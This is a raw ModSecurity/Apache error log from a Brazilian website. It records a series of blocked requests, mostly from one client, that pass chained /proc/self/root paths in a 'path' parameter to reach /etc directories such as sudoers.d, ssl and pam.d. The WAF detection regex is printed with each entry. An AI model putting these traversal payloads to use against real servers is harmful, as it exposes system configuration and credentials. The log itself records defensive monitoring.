[Mon Mar 16 17:35:44.298389 2026] [:error] [pid 29802:tid 140411632822016] [client 74.7.241.46:38740] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpoM_BxrYCr4hPDw8DFwAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:35:45.481530 2026] [:error] [pid 29507:tid 140411649607424] [client 74.7.241.46:38742] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpoUr9dMAiw-8KANNiWgAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:35:46.749022 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.241.46:38750] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpov9ocpUE4ed4uDwL7QAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:35:50.742751 2026] [:error] [pid 29802:tid 140411548894976] [client 74.7.241.46:51658] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpps_BxrYCr4hPDw8DHAAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:35:53.511365 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.241.46:51662] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpqdSswJuvopo3lOh3mgAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:35:56.432201 2026] [:error] [pid 10831:tid 140411565680384] [client 74.7.243.203:60416] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhprI6lpbStxTqkSkuC0QAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:36:07.342347 2026] [:error] [pid 15568:tid 140411708356352] [client 74.7.241.46:51666] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpt6QpVkWug9HeOt9NkQAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:36:20.625553 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.241.46:57340] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpxNSswJuvopo3lOh3rAAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:36:22.952613 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.241.46:42684] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpxrABkC4fWIHEf8EOLwAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:36:33.688408 2026] [:error] [pid 14895:tid 140411565680384] [client 74.7.241.46:42692] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhp0VajLEzk2WiQ-10rRwAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:36:36.707838 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.241.46:43820] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhp1LABkC4fWIHEf8EONQAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:36:38.005156 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.241.46:43830] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhp1rysWC90G-1nBrBdlQAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:36:40.275118 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.241.46:44620] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhp2I6lpbStxTqkSkuC_AAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:36:46.442870 2026] [:error] [pid 15061:tid 140411540502272] [client 74.7.228.16:38906] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhp3qTCbgAP5jq5TehE3gAAAtg"]
[Mon Mar 16 17:36:55.203153 2026] [:error] [pid 14895:tid 140411691570944] [client 74.7.241.46:44636] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhp51ajLEzk2WiQ-10raQAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:01.318652 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.241.46:54246] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhp7f9ocpUE4ed4uDwMBwAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:02.708187 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.241.46:54642] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhp7rysWC90G-1nBrBdoAAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:03.919514 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.241.46:54648] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhp746lpbStxTqkSkuDFQAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:05.211720 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.241.46:54664] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhp8aTCbgAP5jq5TehE5AAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:06.460981 2026] [:error] [pid 15061:tid 140411708356352] [client 74.7.241.46:54666] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhp8qTCbgAP5jq5TehE5gAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:07.754879 2026] [:error] [pid 14895:tid 140411666392832] [client 74.7.241.46:54678] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhp81ajLEzk2WiQ-10rdQAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:09.051055 2026] [:error] [pid 14895:tid 140411649607424] [client 74.7.241.46:38428] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhp9VajLEzk2WiQ-10reAAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
